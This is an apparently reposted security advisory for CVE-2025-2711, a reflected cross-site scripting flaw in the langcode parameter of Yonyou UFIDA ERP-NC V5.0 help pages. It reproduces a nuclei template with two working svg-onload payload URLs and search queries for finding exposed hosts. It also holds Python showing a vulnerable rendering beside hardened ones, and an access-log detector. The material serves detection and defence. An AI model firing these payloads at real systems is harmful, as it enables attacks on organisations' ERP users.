Yonyou UFIDA ERP-NC V5.0 Cross-Site Scripting Vulnerability

Vulnerability information

Vulnerability name: Yonyou UFIDA ERP-NC V5.0 Cross-Site Scripting Vulnerability

Vulnerability IDs:

  • CVE: CVE-2025-2711

Vulnerability type: Cross-site scripting (XSS)

Severity: Medium

Description: Yonyou UFIDA ERP-NC V5.0 is a widely used enterprise resource planning (ERP) system designed to help enterprises integrate and manage their business processes. It is deployed extensively, particularly in organizations that need to manage complex business processes. The vulnerability lies in the system's help files, specifically the /help/systop.jsp and /help/top.jsp pages: user input supplied in the langcode parameter is neither sanitized nor validated before being reflected, which results in a reflected cross-site scripting (XSS) vulnerability. An attacker can craft a specific URL and lure a victim into opening it, causing arbitrary JavaScript to execute in the victim's browser. Exploitation may lead to session hijacking, credential theft or other malicious activity, seriously affecting the security of enterprise data and the integrity of business processes. Because the attacker has to trick a user into opening a malicious link, exploitation requires some user interaction, but the potential impact should still not be underestimated.

Vendor: yonyou

Product: ufida_erp-nc

Affected version: 5.0

Search query: icon_hash="1085941792"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/cd3f0bbe89645227d2719a307ce0e0963bb16597/http%2Fcves%2F2025%2FCVE-2025-2711.yaml

Type: projectdiscovery/nuclei-templates: github issues

POC details
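The following Python snippet is an added example, not the vendor's JSP code and not part of the nuclei template: it models the defect the description names with a stand-in page that reflects langcode into a double-quoted HTML attribute (an assumed reflection context, chosen because the template's payload opens with 1"> to close exactly such an attribute), and places beside it the two remediation layers the template recommends, an allowlist for the parameter and HTML output encoding. The allowlist pattern is hypothetical; the product's real set of valid langcode values is not on the page.

```python
import html
import re
from urllib.parse import unquote

# Constructed payload: the decoded form of the first langcode value the
# nuclei template sends, i.e. 1"><svg onload=alert(document.domain)>
TEMPLATE_PAYLOAD = unquote('1%22%3E%3Csvg%20onload=alert(document.domain)%3E')


def render_vulnerable(langcode: str) -> str:
    """Stand-in for the defect (CWE-79): the raw parameter is written into a
    double-quoted attribute, so a value beginning with 1"> terminates the
    attribute and the tag, and the remainder is parsed as new markup.
    This reflection context is an assumption, not the vendor's actual JSP."""
    return f'<div class="helptop" data-langcode="{langcode}">Help</div>'


def render_encoded_only(langcode: str) -> str:
    """Output encoding alone: quote=True also encodes the double quote, so the
    value can no longer terminate the attribute it sits in."""
    encoded = html.escape(langcode, quote=True)
    return f'<div class="helptop" data-langcode="{encoded}">Help</div>'


# Hypothetical allowlist for a language code; the real set is not on the page.
LANGCODE_RE = re.compile(r'^[A-Za-z0-9_-]{1,16}$')
DEFAULT_LANGCODE = '1'


def validate_langcode(langcode: str) -> str:
    """Input validation: anything outside the allowlist is replaced by the default."""
    return langcode if LANGCODE_RE.fullmatch(langcode) else DEFAULT_LANGCODE


def render_hardened(langcode: str) -> str:
    """Both layers: validate on input, encode on output. Encoding is a no-op for
    allowlisted values but stays in place so the page remains safe if the
    allowlist is later relaxed."""
    safe = html.escape(validate_langcode(langcode), quote=True)
    return f'<div class="helptop" data-langcode="{safe}">Help</div>'


def markup_injected(rendered: str) -> bool:
    """True when the rendered page contains an <svg tag, i.e. the value broke
    out of the attribute. This mirrors what the template's body matcher looks
    for: the reflected tag, not the encoded text."""
    return '<svg' in rendered


if __name__ == '__main__':
    for name, fn in (('vulnerable', render_vulnerable),
                     ('encoded only', render_encoded_only),
                     ('validated + encoded', render_hardened)):
        out = fn(TEMPLATE_PAYLOAD)
        print(f'{name:20} injected={markup_injected(out)}  {out}')
```

Run as a script it prints the three renderings side by side: only the vulnerable one contains a live <svg> element; the encoded rendering shows the payload as inert text, and the validated rendering shows the default language code because the payload never matched the allowlist.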

id: CVE-2025-2711

info:
  name: Yonyou UFIDA ERP-NC V5.0 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Yonyou UFIDA ERP-NC V5.0 is vulnerable to reflected cross-site scripting (XSS) via the langcode parameter in /help/systop.jsp and /help/top.jsp. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution.
  impact: |
    Successful exploitation of this XSS vulnerability allows attackers to execute arbitrary JavaScript code in victims' browsers, potentially leading to session hijacking, credential theft, or other malicious activities in the ERP system.
  remediation: |
    Update Yonyou UFIDA ERP-NC to the latest version. Implement proper input validation and output encoding for all user-supplied data, especially the langcode parameter in help JSP files.
  reference:
    - https://github.com/Hebing123/cve/issues/86
    - https://nvd.nist.gov/vuln/detail/CVE-2025-2711
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2025-2711
    cwe-id: CWE-79
    cpe: cpe:2.3:a:yonyou:ufida_erp-nc:5.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: yonyou
    product: ufida_erp-nc
    fofa-query: icon_hash="1085941792"
    shodan-query: title:"用友"
  tags: cve,cve2025,xss,erp-nc,ufida,yonyou

http:
  - method: GET
    path:
      - "{{BaseURL}}/help/systop.jsp?langcode=1%22%3E%3Csvg%20onload=alert(document.domain)%3E"
      - "{{BaseURL}}/help/systop.jsp?langcode=1%22%3E%3C/script%3E%3Csvg%20onload=alert(document.domain)%3E"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<svg onload=alert(document.domain)>.png)'
          - 'Search.jsp'
        condition: and

      - type: word
        part: content_type
        words:
          - 'text/html'

      - type: status
        status:
          - 200
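The template above confirms the issue from the attacker's side, by finding its own payload reflected in the response body. The complementary view for a defender is the web server's access log, where the same requests are visible before any patch is applied. The Python below is an added example, not part of the nuclei template or the vendor's product: it parses combined-format access-log lines (the sample lines are constructed, with the two payload URLs copied from the template's path list) and flags any request to the two help pages whose decoded langcode value falls outside a hypothetical language-code allowlist. The allowlist is an assumption; the real set of valid values is not on the page.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Hypothetical allowlist for langcode; the product's real value set is not on the page.
LANGCODE_RE = re.compile(r'^[A-Za-z0-9_-]{1,16}$')

# The two help pages the advisory names as affected.
WATCHED_PATHS = {'/help/systop.jsp', '/help/top.jsp'}

# Combined log format: client, identity, user, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample access-log lines. Lines two and three carry the two URLs
# the template sends; the other lines are benign background traffic, and the
# last one repeats the parameter to show that every value is checked.
SAMPLE_LOG = """\
203.0.113.5 - - [17/Jul/2025:10:02:11 +0000] "GET /help/systop.jsp?langcode=zh_CN HTTP/1.1" 200 5120
203.0.113.9 - - [17/Jul/2025:10:02:15 +0000] "GET /help/systop.jsp?langcode=1%22%3E%3Csvg%20onload=alert(document.domain)%3E HTTP/1.1" 200 5190
203.0.113.9 - - [17/Jul/2025:10:02:16 +0000] "GET /help/systop.jsp?langcode=1%22%3E%3C/script%3E%3Csvg%20onload=alert(document.domain)%3E HTTP/1.1" 200 5190
198.51.100.2 - - [17/Jul/2025:10:03:40 +0000] "GET /login.jsp HTTP/1.1" 200 2048
198.51.100.7 - - [17/Jul/2025:10:04:02 +0000] "GET /help/top.jsp?langcode=en&langcode=%3Cscript%3E HTTP/1.1" 200 5190
"""


def suspicious_langcode_requests(log_text: str) -> list[dict]:
    """Return one finding per langcode value that is not a plausible language code.
    Only requests to the affected help pages are inspected."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format: skip, don't crash
        parts = urlsplit(m['target'])
        if parts.path not in WATCHED_PATHS:
            continue
        # parse_qs percent-decodes exactly once, which is what the servlet
        # container does before the JSP sees the value.
        values = parse_qs(parts.query, keep_blank_values=True).get('langcode', [])
        for value in values:
            if not LANGCODE_RE.fullmatch(value):
                findings.append({
                    'ip': m['ip'],
                    'ts': m['ts'],
                    'path': parts.path,
                    'status': int(m['status']),
                    'langcode': value,
                })
    return findings


if __name__ == '__main__':
    for f in suspicious_langcode_requests(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['path']} status={f['status']} langcode={f['langcode']!r}")
```

Matching the decoded value against an allowlist rather than searching for the literal `<svg` string means encoded variants of the same probe (a different tag, a different event handler) are still surfaced, and a 200 status on a flagged line tells the responder the page answered normally, which is the reflected-XSS case the template's status matcher also requires.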


http://example.com/2025/07/17/github_163642272/
Author: lianccc
Published: 17 July 2025